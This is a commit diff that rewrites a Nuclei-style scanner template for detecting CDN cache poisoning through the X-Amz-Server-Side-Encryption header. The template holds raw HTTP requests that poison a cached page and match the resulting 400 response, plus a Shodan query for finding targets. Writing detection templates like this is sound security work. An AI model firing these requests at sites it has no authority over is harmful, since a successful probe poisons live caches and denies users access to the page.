misc updates
- Added random cache key + random header value + removed request condition as it's enabled as default - Update severity from medium to unknown as impact is unclear.patch-1
parent
d189a2a70c
commit
f1d37896b1
|
@ -1,34 +0,0 @@
|
||||||
id: cdn-cache-poisoning-aes256
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Misconfigured CDN Cache Poisoning via X-Amz-Server-Side-Encryption Header
|
|
||||||
author: 0xcharan
|
|
||||||
severity: medium
|
|
||||||
description: |
|
|
||||||
When the X-Amz-Server-Side-Encryption: AES256xss header is sent, it can lead to a misconfigured CDN cache response with a 400 status code, making the page inaccessible.
|
|
||||||
impact: |
|
|
||||||
This vulnerability can disrupt website availability by poisoning the CDN cache, potentially leading to denial of service for users trying to access the page.
|
|
||||||
reference:
|
|
||||||
- https://portswigger.net/web-security/web-cache-poisoning
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
shodan-query: "X-Amz-Server-Side-Encryption"
|
|
||||||
tags: cache,aws,poisoning,cdn
|
|
||||||
|
|
||||||
variables:
|
|
||||||
string: "{{to_lower(rand_base(5))}}"
|
|
||||||
|
|
||||||
requests:
|
|
||||||
- raw:
|
|
||||||
- |
|
|
||||||
GET /?cache={{string}} HTTP/1.1
|
|
||||||
X-Amz-Server-Side-Encryption: AES256xss
|
|
||||||
|
|
||||||
- |
|
|
||||||
GET /?cache={{string}} HTTP/1.1
|
|
||||||
|
|
||||||
req-condition: true
|
|
||||||
matchers:
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(body_2, "AES256xss") && status_code_2==400'
|
|
|
@ -0,0 +1,37 @@
|
||||||
|
id: cdn-cache-poisoning
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Misconfigured CDN Cache Poisoning via X-Amz-Server-Side-Encryption Header
|
||||||
|
author: 0xcharan
|
||||||
|
severity: unknown
|
||||||
|
description: |
|
||||||
|
When the X-Amz-Server-Side-Encryption header is sent with user controlled value, it can lead to a misconfigured CDN cache response with a 400 status code, making the page inaccessible.
|
||||||
|
impact: |
|
||||||
|
This vulnerability can disrupt website availability by poisoning the CDN cache, potentially leading to denial of service for users trying to access the page.
|
||||||
|
reference:
|
||||||
|
- https://portswigger.net/web-security/web-cache-poisoning
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: "X-Amz-Server-Side-Encryption"
|
||||||
|
tags: cache,aws,poisoning,cdn
|
||||||
|
|
||||||
|
variables:
|
||||||
|
string: "{{to_lower(rand_base(8))}}={{to_lower(rand_base(8))}}"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /?{{string}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
X-Amz-Server-Side-Encryption: {{randstr}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /?{{string}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(body_2, "{{randstr}}")'
|
||||||
|
- 'status_code_2==400'
|
||||||
|
condition: and
|
Loading…
Reference in New Issue